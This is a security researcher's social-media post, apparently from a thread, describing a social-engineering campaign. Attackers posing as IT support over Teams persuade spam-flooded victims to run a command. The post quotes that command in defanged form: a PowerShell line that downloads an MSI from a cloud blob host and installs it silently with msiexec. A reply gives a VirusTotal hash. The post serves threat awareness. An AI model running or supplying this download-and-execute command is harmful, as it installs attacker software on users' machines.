Elektrine lite

← Feed

@realn2s@infosec.exchange

2026-09-28 12:50 UTC

A short while later they got contacted through team by someone claiming to be from IT support. WHile this isn't a new pattern it is very mean and I guess reasonable effective. Imagin, you are drowning in spam, suddenly you get a call, offering to help you solving your problem! IN the stress and mental overload situation there is a good chance that you gratefully accept the "help" . Initially the attackers tried to trick the victims to enable remote access. Later they switched to trying to get the victims to download and install a MSI via a PowerSHell command iwr -Uri "hxxps[://]linkupd3[.]blob[.]core[.]windows[.]net/upd/hotfix_v2[.]6[.]msi" -OutFile "$env:USERPROFILE\downloads\update_v2.6[.]msi";msiexec[.]exe /i "$env:USERPROFILE\downloads\update_v2.6[.]msi" /qn Again, the two commands are looking like a single command. And the download happens from Microsoft infrastructure which make it look legit. (the file is no longer available) #SocialEngineering

Replies (1)

  • @realn2s@infosec.exchange 2026-09-28 12:55

    VirusTotal knows about the file https://www.virustotal.com/gui/file/a9174413214a6cdb3646d6cf14de3f6b557a5f1e7214a8f27969212907386a31/details Sadly, I could get my hands on the malicious MSI file. So if someone has it I would love to look inside SIde not: Why is the VirusToal first sen in the wild date after the first submission date??? #SOcialEngineering #VirusTotal

    Open ##4883664